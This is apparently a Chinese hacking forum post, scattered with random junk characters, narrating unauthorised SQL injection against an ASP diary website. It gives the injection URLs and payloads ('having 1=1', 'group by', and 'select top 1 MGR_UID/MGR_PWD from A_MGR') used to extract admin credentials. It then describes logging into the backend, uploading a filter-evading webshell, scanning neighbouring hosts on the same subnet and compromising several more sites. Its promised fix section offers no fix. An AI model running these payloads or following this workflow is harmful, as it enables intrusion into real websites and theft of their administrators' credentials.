发现一个注入点
" {% }5 F; |/ t. Qhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
# X+ W" t4 H7 D* j: e
7 R! p+ n" N2 P! u- [习惯性的加’having1=1--1 N0 u6 L' O% s, z3 H
$ ]( X. h: b7 k! m6 L; \4 W. {
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—' G' O- v7 l# U7 W6 `( K
! Y6 Y6 s. B% w0
X7 ~2 i' A/ z% q6 A( G4 n$ q% U& N- Y5 W; `/ n/ b; \0 v* n
爆出Diary_A.dl_Title(这时候很激动啊)
3 f E+ E. e, [, L* i
4 ^. L/ ~; n2 A# L1 [那么继续
0 A0 O& F. s- w! g" p1 r% mhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—' W' Z# ?: H( l/ b6 y
' u. \: L, M# d' E5 x- i
继续,一直爆下去: ]) u$ v0 [9 H6 j x8 Y$ @& t
! H- C3 p2 e% e1 G3 m! H
爆到几个字段和表段 但是没找到需要的管理用户的字段* q4 e; S7 `5 ~" `, P
9 L7 h+ \. q( U* w9 U0 ?
蛋疼了 怎么办 然后去后台登陆页看源码
/ ?. [8 \/ F/ L* S8 @% J
. ]; s- m' J: [ v& o: ^4 z* Z- s03 F1 I, h! F, m% ~. ^# J1 p6 X
/ `5 k" S; z" |) b: GInput name= “ADUID”1 s7 ~& ?5 v! K/ F- E7 Z2 Y' v8 L
Input name= “ADPWD”
3 a2 z( n' I! [1 z3 P( y
& |1 i+ b' k8 j! ^- I) _很幸运 找到了字段那就继续
" ?. z7 e2 ~ g$ a: W4 D5 [找到之后开始爆用户1 h a7 `0 }; D% l7 j
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
! W. z* P0 H& s( ]* r' q( @爆密码4 p9 W/ e6 `" |9 i+ F% \
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
0 x7 n8 a8 h6 v' `6 R6 h5 U测试了下 这个注入点只能爆到文章哪里的表 , B: H* `. I3 a" U! Y) F, x
4 c# g( A6 i# r) c* [/ |5 j" l
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了6 q/ Q+ d9 u( S3 ~# }' @" E
* O8 z0 g0 C+ Y2 h [# ?又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了6 T. t3 a. E- E4 K! o% [
" M, O/ `% `. W7 U) q! N
473
; h: z8 ^, v5 E7 { W9 a) s% k! J1 [3 J; K& o1 ^
进后台 }7 O4 U/ A- C+ F3 J7 s
Q/ }, [- l3 v S1 W: m, w
! I- b5 e4 H3 e3 g! p5 O/ ]
发现几个上传点 有的地方不能上传 而且防止恶意代码6 X+ C2 e9 Q' V* _
" y5 W8 z7 b$ j; f0 J
没办法 各种百度各种找大牛 找到一只好像可以突破的马% g; ?4 ^8 a* o5 X# W
* V3 |% n5 U, F; |
& ^: t+ s! m7 K$ R) V/ y1 R在系统管理那里直接上传 不过没有显示地址% G" ], U6 t- I+ z5 v1 L
3 Q$ f' @5 G/ @
再上传一次 抓包 搞定OK9 c7 D6 _+ u5 d) w
! W* Y: I) u) ^; x% }
! `- u. y r O" e3 O9 x
# U0 h$ S) b1 b5 @472
# }& O8 ]9 y9 a* R0 C* k# I5 z* H, v! y- i
晚上不行了 去睡觉。。。; t9 Q# @/ |5 ~
第二天刚起床 闲的没事做继续日站吧
& P% K' H7 _( S' X, s p$ a5 ~" r- y: h/ C$ x7 ]: p6 s
找个站 就把这个站的旁c扫了下2 I3 a% P) l0 G" S( }: e4 [& D
. P+ f, V9 _* D. n
发现c段也有一个购物站 ,然后还和这个站的模板差不多7 y- A: I7 g# _
; C# i: m' C6 Y: M) C, s" O" d
就找到会员登录口测试/ O; [) ?6 l# P% t* K3 N5 }/ T3 ]3 _
6 d7 x/ l+ d) {; D'and (select top 1 MGR_UID from A_MGR)>0—" t0 @' m$ N$ @/ z2 P
果断爆到了 这时候我很激动 通杀9 K- K% x5 ^- Q0 a
0 E b! Y7 Q$ A
再次翻c段% w3 E0 e- A! E$ p* D9 p
6 B5 Z& ~# U9 Y1 G. ~" q7 J) A
翻出几个站 都成功拿下
" | V. o2 u3 m$ W3 l B) \% R; ?
' `# {% `8 [0 \4 ~# L7 A2 A% ^* x) u& R4 W: `+ j
* q0 _3 D/ I& z9 c+ J8 g o修复方案:
; y8 n6 w8 L, D. m1 p- B他们比我专业
5 e: i% Z- A( \# |0 O# B y+ h: s" C- R& y
$ i: o* s6 D' o8 l/ w0 k
( y3 G3 m( i! i Y |